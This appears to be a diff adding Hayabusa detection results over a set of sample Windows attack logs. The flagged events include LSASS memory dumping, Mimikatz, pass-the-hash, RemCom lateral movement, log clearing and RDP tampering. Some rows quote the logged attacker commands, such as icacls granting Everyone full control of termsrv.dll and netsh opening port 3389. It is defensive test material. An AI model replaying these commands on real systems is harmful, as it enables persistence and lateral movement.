+2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\TSTheme.exe -Embedding  :  Path: C:\Windows\System32\TSTheme.exe  :  User: PC01\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe  :  Path: C:\Windows\System32\AtBroker.exe  :  User: PC01\IEUser  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0)  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: System32\RemComSvc.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\System32\RemComSvc.exe  :  IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx
+2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
+2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
+2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
+2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
+2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat""   :  Path: C:\Windows\System32\cmd.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst""  -i -o  :  Path: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe  :  User: PC04\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Registry Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow  :  Path: C:\Windows\System32\netsh.exe  :  User: PC04\IEUser  :  Parent Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst""  -i -o",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Netsh Port or Application Allowed,,rules/sigma/process_creation/win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Netsh RDP Port Opening,,rules/sigma/process_creation/win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding  :  Path: C:\Windows\System32\rundll32.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe""   :  Path: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\takeown.exe"" /f  C:\Windows\System32\termsrv.dll  :  Path: C:\Windows\System32\takeown.exe  :  User: PC04\IEUser  :  Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F  :  Path: C:\Windows\System32\icacls.exe  :  User: PC04\IEUser  :  Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F)  :  Path: C:\Windows\System32\icacls.exe  :  User: PC04\IEUser  :  Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx
+2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx
+2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,informational,Logon Type 9 - NewCredentials,User: user01  :  Workstation:   :  IP Address: ::1  :  Port: 0  :  LogonID: 0x4530f0f  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: user01  :  LogonID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
+2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: user01  :  Target User: administrator  :  IP Address: -  :  Process: C:\Windows\System32\svchost.exe  :  Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01  :  Target User: administrator  :  IP Address: -  :  Process: C:\Windows\System32\wbem\WMIC.exe  :  Target Server: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01  :  Target User: administrator  :  IP Address: -  :  Process: C:\Windows\System32\wbem\WMIC.exe  :  Target Server: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
+2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Program Files\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: BGinfo  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
